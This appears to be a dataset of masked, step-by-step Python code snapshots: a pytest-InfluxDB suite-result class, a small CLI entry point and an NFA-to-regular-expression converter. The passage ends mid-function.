"step-3": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-4": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [{'measurement': measurement_name, 'tags': {'run': self\n .__run, 'project': self.__project, 'version': self.__version},\n 'fields': {'pass': self.__passed, 'fail': self.__failed, 'skip':\n self.__skipped, 'error': self.__error, 'disabled': self.\n __disabled, 'duration_sec': self.__duration_sec, 'retries':\n self.__retries}}]\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = 
list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-5": "import json\nimport time\n\nfrom pytest_influxdb.data_manager import DataManager\n\n\nclass SuiteResultDTO:\n __run = 'UNDEFINED'\n __project = 'UNDEFINED'\n __version = 'UNDEFINED'\n __passed = None\n __failed = None\n __skipped = None\n __error = None\n __duration_sec = 0\n __disabled = 0\n __retries = 0\n __suite_result_dict = {'tags': {}, 'fields': {}}\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n\n def set_passed(self, passed):\n self.__passed = int(passed)\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n\n def set_retries(self, retries):\n self.__retries = int(retries)\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [\n {\n \"measurement\": measurement_name,\n \"tags\": {\n \"run\": self.__run,\n \"project\": self.__project,\n \"version\": self.__version\n },\n \"fields\": {\n \"pass\": self.__passed,\n \"fail\": self.__failed,\n \"skip\": self.__skipped,\n \"error\": self.__error,\n \"disabled\": self.__disabled,\n \"duration_sec\": self.__duration_sec,\n \"retries\": self.__retries\n }\n }\n ]\n\n # Appending custom values to json_body\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):\n # Preparing execution time and suite results from the terminalreporter (where all the data collected)\n execution_time = round(time.time() - terminalreporter._sessionstarttime)\n suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)\n # Setting the values to the suite_result_dto instance\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get(\"run\"))\n self.set_project(global_values.get(\"project\"))\n 
self.set_version(global_values.get(\"version\"))\n self.set_suite_custom_values(global_values.get(\"influxdb_values\"))\n\n self.merge_suite_result(global_values.get('merged'), influxdb_components,\n db_measurement_name_for_suite, global_values.get(\"run\"))\n\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):\n # Merging the existing suite results with the suite_results from db for the same run\n # if 'merged' config value is True\n existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][\n 'skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(\n old_suite_total_count - self.__failed - self.__skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)\n",
"step-ids": [
13,
14,
15,
16,
21
]
}
|
[
13,
14,
15,
16,
21
] |
import sys
from . import cli
def main() ->None:
try:
command = sys.argv[0]
args = sys.argv[1:]
cli.main(command, args)
except KeyboardInterrupt:
pass
|
normal
|
{
"blob_id": "9969dcf820a5ff34b483593cd43e4dfba9588ed2",
"index": 4348,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-3": "import sys\nfrom . import cli\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<|reserved_special_token_0|>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<|reserved_special_token_0|>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def copyDeltas(src):
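    # Deep-enough copy of the two-level delta map: new outer dict, new inner
    # dicts, and a shallow copy of each destination set.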
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
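        # Accepts either a single Node or a set of Nodes as the destination
        # and merges it into any transitions already recorded for (node, input).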
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
<|reserved_special_token_1|>
from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from os.path import commonprefix
DEBUG = False
LAMBDA = u'λ'
PHI = u'Ø'
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
